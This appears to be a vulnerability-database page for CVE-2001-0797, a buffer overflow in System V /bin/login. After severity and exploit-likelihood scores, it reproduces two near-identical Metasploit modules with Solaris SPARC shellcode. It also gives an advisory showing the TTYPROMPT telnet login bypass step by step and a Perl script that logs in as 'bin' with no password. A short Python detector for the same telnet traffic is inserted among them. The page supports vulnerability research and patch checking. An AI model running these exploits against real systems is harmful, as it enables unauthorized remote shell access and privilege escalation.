Buffer overflow in login in various System V based operating systems allows remote attackers to execute arbitrary commands via a large number of arguments through services such as telnet and rlogin.
CVE Information
Metrics
Metrics | Score | Severity | CVSS Vector | Source
V2 | 10 | | AV:N/AC:L/Au:N/C:C/I:C/A:C | nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date | EPSS V0 | EPSS V1 | EPSS V2 (> 2022-02-04) | EPSS V3 (> 2025-03-07) | EPSS V4 (> 2025-03-17)
2022-02-06 | – | – | 89.92% | – | –
2023-03-12 | – | – | – | 97.43% | –
2023-04-23 | – | – | – | 97.39% | –
2023-11-05 | – | – | – | 97.36% | –
2024-02-11 | – | – | – | 97.24% | –
2024-06-02 | – | – | – | 97.21% | –
2024-12-22 | – | – | – | 97.03% | –
2025-01-19 | – | – | – | 97.03% | –
2025-03-18 | – | – | – | – | 91.66%
2025-04-22 | – | – | – | – | 91.7%
2025-04-22 | – | – | – | – | 91.7%
EPSS Percentile
The percentile ranks CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. The percentile is therefore a way to compare the EPSS score of one CVE with that of other CVEs.
##
# $Id: manyargs.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::Dialup
def initialize(info = {})
super(update_info(info,
'Name' => 'System V Derived /bin/login Extraneous Arguments Buffer Overflow',
'Description' => %q{
This exploit connects to a system's modem over dialup and exploits
a buffer overlflow vulnerability in it's System V derived /bin/login.
The vulnerability is triggered by providing a large number of arguments.
},
'References' =>
[
[ 'CVE', '2001-0797'],
[ 'OSVDB', '690'],
[ 'OSVDB', '691'],
[ 'BID', '3681'],
[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2002-10/0014.html'],
[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-12/0404.html'],
],
'Version' => '$Revision: 9669 $',
'Author' =>
[
'I)ruid',
],
'Arch' => ARCH_TTY,
'Platform' => ['unix'],
'License' => MSF_LICENSE,
'Payload' =>
{
'Space' => 3000,
'BadChars' => '',
'DisableNops' => true,
},
'Targets' =>
[
[ 'Solaris 2.6 - 8 (SPARC)',
{
'Platform' => 'unix',
'Ret' => 0x00027184,
# Solaris/SPARC special shellcode (courtesy of inode)
# execve() + exit()
'Shellcode' =>
"\x94\x10\x20\x00\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc" +
"\xa2\x14\x63\x68\xd4\x23\xbf\xfc\xe2\x23\xbf\xf8\xe0\x23\xbf\xf4" +
"\x90\x23\xa0\x0c\xd4\x23\xbf\xf0\xd0\x23\xbf\xec\x92\x23\xa0\x14" +
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x82\x10\x20\x01\x91\xd0\x20\x08",
'NOP' => "\x90\x1b\x80\x0e",
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 12 2001'))
register_options(
[
# OptString.new('USER', [true, 'User to log in as', 'bin']),
], self.class)
end
def buildbuf
print_status("Targeting: #{self.target.name}")
retaddr = self.target.ret
shellcode = self.target['Shellcode']
nop = self.target['NOP']
user = datastore['USER']
command = datastore['COMMAND'] + "\n"
# prepare the evil buffer
i = 0
buf = ''
# login name
buf[i,4] = 'bin '
i += 4
# return address
buf[i,4] = [retaddr].pack('N')
i += 4
buf[i,1] = ' '
i += 1
# trigger the overflow
(0...60).each {|c|
buf[i,2] = 'a '
i += 2
}
# padding
buf[i,4] = ' BBB'
i += 4
# nop sled and shellcode
(0...398).each {|c|
buf[i,nop.size] = nop
i += nop.size
}
shellcode.each_byte {|b|
c = b.chr
case 'c'
when "\\"
buf[i,2] = "\\\\"
i += 2
when "\xff", "\n", " ", "\t"
buf[i,1] = "\\"
buf[i+1,1] = (((b & 0300) >> 6) + '0').chr
buf[i+2,1] = (((b & 0070) >> 3) + '0').chr
buf[i+3,1] = ( (b & 0007) + '0').chr
i += 4
else
buf[i,1] = c
i += 1
end
}
# TODO: need to overwrite/skip the last byte of shellcode?
#i -= 1
# padding
buf[i,4] = 'BBB '
i += 4
# pam_handle_t: minimal header
buf[i,16] = 'CCCCCCCCCCCCCCCC'
i += 16
buf[i,4] = [retaddr].pack('N')
i += 4
buf[i,4] = [0x01].pack('N')
i += 4
# pam_handle_t: NULL padding
(0...52).each {|c|
buf[i,4] = [0].pack('N')
i += 4
}
# pam_handle_t: pameptr must be the 65th ptr
buf[i,9] = "\x00\x00\x00 AAAA\n"
i += 9
return buf
end
def exploit
buf = buildbuf
print_status("Dialing Target")
if not connect_dialup
print_error("Exiting.")
return
end
print_status("Waiting for login prompt")
res = dialup_expect(/ogin:\s/i, 10)
#puts Rex::Text.to_hex_dump(res[:buffer])
if not res[:match]
print_error("Login prompt not found... Exiting.")
disconnect_dialup
return
end
# send the evil buffer, 256 chars at a time
print_status("Sending evil buffer...")
#puts Rex::Text.to_hex_dump(buf)
len = buf.length
p = 0
while(len > 0) do
i = len > 0x100 ? 0x100 : len
#puts Rex::Text.to_hex_dump(buf[p,i])
dialup_puts(buf[p,i])
len -= i
p += i
# if len > 0
# puts Rex::Text.to_hex_dump("\x04")
# dialup_puts("\x04") if len > 0
# end
select(nil,nil,nil,0.5)
end
# wait for password prompt
print_status("Waiting for password prompt")
res = dialup_expect(/assword:/i, 30)
#puts Rex::Text.to_hex_dump(res[:buffer])
if not res[:match]
print_error("Target is likely not vulnerable... Exiting.")
disconnect_dialup
return
end
print_status("Password prompt received, waiting for shell")
dialup_puts("pass\n")
res = dialup_expect(/#\s/i, 20)
#puts Rex::Text.to_hex_dump(res[:buffer])
if not res[:match]
print_error("Shell not found.")
print_error("Target is likely not vulnerable... Exiting.")
disconnect_dialup
return
end
print_status("Success!!!")
handler
disconnect_dialup
end
end
Publication date : 2002-11-01 23h00 +00:00 Author : Jonathan S. EDB Verified : Yes
Solaris TTYPROMPT Security Vulnerability (Telnet)
This vulnerability is very simple to exploit, since it does not require
any code to be compiled by an attacker. The vulnerability only requires
the attacker to simply define the environment variable TTYPROMPT to a
6-character string, inside telnet. Jonathan believes this overflows an
integer inside login, which specifies whether the user has been
authenticated (just a guess).
Once connected to the remote host, you must type the username, followed
by 64 " c"s, and a literal "\n". You will then be logged in as the user
without any password authentication. This should work with any account
except root (unless remote root login is allowed).
Example:
coma% telnet
telnet> environ define TTYPROMPT abcdef
telnet> o localhost
SunOS 5.8
bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
Last login: whenever
$ whoami
bin
# milw0rm.com [2002-11-02]
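A defender-side check for the two conditions the advisory above describes (TTYPROMPT defined through the telnet environment option, and a login name followed by dozens of arguments), as an added example that is not part of the original advisory. The function names, the MAX_LOGIN_ARGS threshold and both sample captures are assumptions constructed for illustration; only the NEW-ENVIRON option (39, RFC 1572) is decoded.

```python
import re

IAC, SB, SE, NEW_ENVIRON = 0xFF, 0xFA, 0xF0, 0x27   # telnet bytes (RFC 854), option 39 (RFC 1572)
MAX_LOGIN_ARGS = 8                                  # assumed alert threshold, tune per site

def split_telnet(stream):
    """Split client bytes into plain data and (option, payload) subnegotiations."""
    data, subs, i, n = bytearray(), [], 0, len(stream)
    while i < n:
        if stream[i] != IAC or i + 1 >= n:          # data byte, or IAC cut off by capture end
            data.append(stream[i]); i += 1
        elif stream[i + 1] == IAC:                  # IAC IAC is an escaped 0xFF data byte
            data.append(IAC); i += 2
        elif stream[i + 1] == SB and i + 2 < n:
            opt, j, payload = stream[i + 2], i + 3, bytearray()
            while j < n and stream[j:j + 2] != b"\xff\xf0":   # stop at IAC SE
                if stream[j:j + 2] == b"\xff\xff":
                    j += 1                          # drop the escape, keep one 0xFF
                payload.append(stream[j]); j += 1
            subs.append((opt, bytes(payload))); i = j + 2
        else:                                       # WILL/WONT/DO/DONT carry an option byte
            i += 3 if 0xFB <= stream[i + 1] <= 0xFE else 2
    return bytes(data), subs

def parse_environ(payload):
    """Decode the fields after the command byte of a NEW-ENVIRON IS/INFO payload."""
    env, name = {}, None
    # Field markers: 0 = VAR, 1 = VALUE, 3 = USERVAR; 2 = ESC makes the next byte literal.
    for kind, body in re.findall(rb"([\x00\x01\x03])((?:\x02.|[^\x00-\x03])*)", payload[1:], re.S):
        text = re.sub(rb"\x02(.)", rb"\1", body, flags=re.S).decode("latin-1")
        if kind != b"\x01":                         # VAR or USERVAR starts a new name
            name = text; env[name] = ""
        elif name is not None:
            env[name] = text
    return env

def inspect_session(stream):
    """Return findings for one client-to-server telnet byte stream."""
    data, subs = split_telnet(stream)
    envs = [parse_environ(p) for opt, p in subs
            if opt == NEW_ENVIRON and p[:1] in (b"\x00", b"\x02")]   # IS or INFO only
    findings = [f"TTYPROMPT={e['TTYPROMPT']!r} set via NEW-ENVIRON" for e in envs if "TTYPROMPT" in e]
    args = len(re.split(rb"[\r\n]", data, maxsplit=1)[0].split()) - 1   # tokens after the login name
    if args > MAX_LOGIN_ARGS:
        findings.append(f"login name followed by {args} arguments")
    return findings

# Constructed sample captures (not real traffic): IAC SB NEW-ENVIRON IS VAR name VALUE value IAC SE, login line.
BENIGN = b"\xff\xfa\x27\x00\x00USER\x01alice\xff\xf0alice\r\n"
SUSPECT = b"\xff\xfa\x27\x00\x00TTYPROMPT\x01abcdef\xff\xf0bin" + b" c" * 64 + b"\n"
```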
source: https://www.securityfocus.com/bid/3681/info
The 'login' program is used in UNIX systems to authenticate users with a username and password. The utility is typically invoked at the console, by 'telnetd', 'rlogind', and if configured to do so, SSH.
Versions of 'login' descended from System V UNIX contain a buffer overflow when handling environment variables. Several operating systems such as Solaris/SunOS, HP-UX, AIX, IRIX, and Unixware contain vulnerable versions of 'login'.
Unauthenticated clients can exploit this issue to execute arbitrary code as root. On systems where 'login' is installed setuid root, local attackers can elevate privileges.
#!/usr/bin/perl
#
# Date: 09/01/2003
# Author: snooq [http://www.angelfire.com/linux/snooq/]
#
# I coded this script to demo how to login to a Solaris box without
# password as 'bin'. Nothing new, it's an old bug which dates back
# to Dec 2001.
#
# And, there are already several versions of exploits circulating
# in the wild for at least a year now.
#
# Due to uninformed/incompetent/ignorant sysadmins, there are still
# quite a number of vulnerable machines out there.
#
# 'root' remote login is not allowed by default. So, unless, it's
# a misconfigured box, you can only go as high as 'bin'. However,
# once you are dropped into a shell, further privilege escalation is
# very possible.
#
# Background info
# ===============
# From http://www.mail-archive.com/bugtraq@securityfocus.com/msg09281.html
#
# [quote]
# The problem is there exists an authentication flag called the "fflag"
# just after the array that gets overflowed in the .bss segment. This is
# an array of char pointers so when it is overflowed because of a
# mismanagement on the indexing of this array the fflag gets overwritten
# with a valid address on .bss segment. this is good enough to satisfy
# the if(fflag) condition and spawn a shell.
# [/quote]
#
# For more info about this bug, go to:
# http://www.cert.org/advisories/CA-2001-34.html
#
# Disclaimer
# ==========
# This is meant for you to do a quick check on your own systems only.
# The author shall not be held responsible for any illegal use
# of this code.
#
# -> some asked 'why code another one?'
# I'm bored.. I guess.... been using other ppl's tools... it's time
# to write my own.. so that I have a reason to feel proud too...
#
# -> again, some asked 'why not in C?'
# ok... I'm lame.. my C sucks... my Perl sucks too...
# I'm not a professional programmer anyway... =p
#
# As usual, any comments or flames, go to jinyean at hotmail.com
#
use Socket;
use FileHandle;
if ($ARGV[0] eq '') {
print "Usage: $0 <host>\n";
exit;
}
$payload="\xff\xfc\x18" # Won't terminal type
."\xff\xfc\x1f" # Won't negotiate window size
."\xff\xfc\x21" # Won't remote flow control
."\xff\xfc\x23" # Won't X display location
."\xff\xfb\x22" # Will linemode
."\xff\xfc\x24" # Won't environment option
."\xff\xfb\x27" # Will new environment option
."\xff\xfb\x00" # Will binary transmission
."\xff\xfa\x27\x00" # My new environ option
."\x00\x54\x54\x59\x50\x52\x4f\x4d\x50\x54" # 'TTYPROMPT'
."\x01\x61\x62\x63\x64\x65\x66" # 'abcdef', any 6 chars will do
."\xff\xf0"; # Suboption end
$port=23;
$user="bin"; # You may change this to another user
$addr=getaddr($ARGV[0]);
for ($i;$i<65;$i++) {
$user.=" c"; # Again, any char will do
}
socket(SOCKET,PF_INET,SOCK_STREAM,(getprotobyname('tcp'))[2]);
connect(SOCKET,pack('Sna4x8',AF_INET,$port,$addr,2)) || die "Can't connect: $!\n";
print "/bin/login array mismanagment exploit by snooq (jinyean\@hotmail.com)\n";
print "Connected. Wait for a shell....\n";
SOCKET->autoflush();
$pid=fork;
if ($pid) { # Parent reads
send(SOCKET, $payload, 0);
send(SOCKET, "$user\n", 0);
read(SOCKET,$buff,69); # Read the garbage
while (<SOCKET>) {;
print STDOUT $_;
}
}
else { # Child sends
print SOCKET while (<STDIN>);
close SOCKET;
}
exit;
sub getaddr {
my $host=($_[0]);
my $n=$host;
$n=~tr/\.//d;
if ($n=~m/\d+/) {
return pack('C4',split('\.',$host));
}
else {
return (gethostbyname($host))[4];
}
}
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Dialup
def initialize(info = {})
super(update_info(info,
'Name' => 'System V Derived /bin/login Extraneous Arguments Buffer Overflow',
'Description' => %q{
This exploit connects to a system's modem over dialup and exploits
a buffer overlflow vulnerability in it's System V derived /bin/login.
The vulnerability is triggered by providing a large number of arguments.
},
'References' =>
[
[ 'CVE', '2001-0797'],
[ 'OSVDB', '690'],
[ 'OSVDB', '691'],
[ 'BID', '3681'],
[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2002-10/0014.html'],
[ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-12/0404.html'],
],
'Version' => '$Revision: 6479 $',
'Author' =>
[
'I)ruid',
],
'Arch' => ARCH_TTY,
'Platform' => ['unix'],
'License' => MSF_LICENSE,
'Payload' =>
{
'Space' => 3000,
'BadChars' => '',
'DisableNops' => true,
},
'Targets' =>
[
['Solaris 2.6 - 8 (SPARC)', {
'Platform' => 'unix',
'Ret' => 0x00027184,
# Solaris/SPARC special shellcode (courtesy of inode)
# execve() + exit()
'Shellcode' =>
"\x94\x10\x20\x00\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc" +
"\xa2\x14\x63\x68\xd4\x23\xbf\xfc\xe2\x23\xbf\xf8\xe0\x23\xbf\xf4" +
"\x90\x23\xa0\x0c\xd4\x23\xbf\xf0\xd0\x23\xbf\xec\x92\x23\xa0\x14" +
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x82\x10\x20\x01\x91\xd0\x20\x08",
'NOP' => "\x90\x1b\x80\x0e",
} ],
],
'DefaultTarget' => 0
))
register_options(
[
# OptString.new('USER', [true, 'User to log in as', 'bin']),
], self.class
)
deregister_options(
)
end
def buildbuf
print_status("Targeting: #{self.target.name}")
retaddr = self.target.ret
shellcode = self.target['Shellcode']
nop = self.target['NOP']
user = datastore['USER']
command = datastore['COMMAND'] + "\n"
# prepare the evil buffer
i = 0
buf = ''
# login name
buf[i,4] = 'bin '
i += 4
# return address
buf[i,4] = [retaddr].pack('N')
i += 4
buf[i,1] = ' '
i += 1
# trigger the overflow
(0...60).each {|c|
buf[i,2] = 'a '
i += 2
}
# padding
buf[i,4] = ' BBB'
i += 4
# nop sled and shellcode
(0...398).each {|c|
buf[i,nop.size] = nop
i += nop.size
}
shellcode.each_byte {|b|
c = b.chr
case 'c'
when "\\"
buf[i,2] = "\\\\"
i += 2
when "\xff", "\n", " ", "\t"
buf[i,1] = "\\"
buf[i+1,1] = (((b & 0300) >> 6) + '0').chr
buf[i+2,1] = (((b & 0070) >> 3) + '0').chr
buf[i+3,1] = ( (b & 0007) + '0').chr
i += 4
else
buf[i,1] = c
i += 1
end
}
# TODO: need to overwrite/skip the last byte of shellcode?
#i -= 1
# padding
buf[i,4] = 'BBB '
i += 4
# pam_handle_t: minimal header
buf[i,16] = 'CCCCCCCCCCCCCCCC'
i += 16
buf[i,4] = [retaddr].pack('N')
i += 4
buf[i,4] = [0x01].pack('N')
i += 4
# pam_handle_t: NULL padding
(0...52).each {|c|
buf[i,4] = [0].pack('N')
i += 4
}
# pam_handle_t: pameptr must be the 65th ptr
buf[i,9] = "\x00\x00\x00 AAAA\n"
i += 9
return buf
end
def exploit
buf = buildbuf
print_status("Dialing Target")
if not connect_dialup
print_error("Exiting.")
return
end
print_status("Waiting for login prompt")
res = dialup_expect(/ogin:\s/i, 10)
#puts Rex::Text.to_hex_dump(res[:buffer])
if not res[:match]
print_error("Login prompt not found... Exiting.")
disconnect_dialup
return
end
# send the evil buffer, 256 chars at a time
print_status("Sending evil buffer...")
#puts Rex::Text.to_hex_dump(buf)
len = buf.length
p = 0
while(len > 0) do
i = len > 0x100 ? 0x100 : len
#puts Rex::Text.to_hex_dump(buf[p,i])
dialup_puts(buf[p,i])
len -= i
p += i
# if len > 0
# puts Rex::Text.to_hex_dump("\x04")
# dialup_puts("\x04") if len > 0
# end
sleep 0.5
end
# wait for password prompt
print_status("Waiting for password prompt")
res = dialup_expect(/assword:/i, 30)
#puts Rex::Text.to_hex_dump(res[:buffer])
if not res[:match]
print_error("Target is likely not vulnerable... Exiting.")
disconnect_dialup
return
end
print_status("Password prompt received, waiting for shell")
dialup_puts("pass\n")
res = dialup_expect(/#\s/i, 20)
#puts Rex::Text.to_hex_dump(res[:buffer])
if not res[:match]
print_error("Shell not found.")
print_error("Target is likely not vulnerable... Exiting.")
disconnect_dialup
return
end
print_status("Success!!!")
handler
disconnect_dialup
end
end